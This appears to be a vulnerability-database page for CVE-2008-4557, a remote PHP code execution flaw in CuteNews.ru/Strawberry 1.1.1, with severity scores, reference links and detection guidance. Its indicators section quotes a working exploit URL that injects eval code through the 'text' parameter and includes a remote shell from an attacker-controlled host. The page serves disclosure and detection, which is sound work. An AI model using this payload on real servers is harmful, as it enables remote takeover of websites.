CVE-2008-4557
published 2008-10-14CVE-2008-4557: plugins/wacko/highlight/html.php in Strawberry in CuteNews.ru 1.1.1 (aka Strawberry) allows remote attackers to execute arbitrary PHP code via the text…
PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
45.34%
98.6th percentile
plugins/wacko/highlight/html.php in Strawberry in CuteNews.ru 1.1.1 (aka Strawberry) allows remote attackers to execute arbitrary PHP code via the text parameter, which is inserted into an executable regular expression.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cutephp | cutenews | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlstrawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');↗
- →The vulnerable parameter is `text` in html.php; attacker injects PHP code wrapped in HTML comment syntax `<!--{${eval(...)}}-->` which is executed via preg_replace() with the 'e' modifier. ↗
- →Monitor HTTP requests targeting `plugins/wacko/highlight/html.php` with a `text` parameter containing PHP eval/include payloads, especially URL-encoded `<!--{${...}}-->` patterns. ↗
- →The exploit payload uses `include()` to pull a remote shell from an attacker-controlled domain; detect outbound PHP include/require calls to external hosts originating from the web process. ↗
- ·Exploitation requires `allow_url_include` (or `allow_url_fopen`) to be enabled in PHP for the remote `include()` payload to fetch the shell; environments with these disabled may still be vulnerable to local code injection via eval. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://secunia.com/advisories/28330http://securityreason.com/securityalert/4403http://www.osvdb.org/40236https://exchange.xforce.ibmcloud.com/vulnerabilities/39450https://www.exploit-db.com/exploits/4851http://secunia.com/advisories/28330http://securityreason.com/securityalert/4403http://www.osvdb.org/40236https://exchange.xforce.ibmcloud.com/vulnerabilities/39450https://www.exploit-db.com/exploits/4851
2008-10-14
Published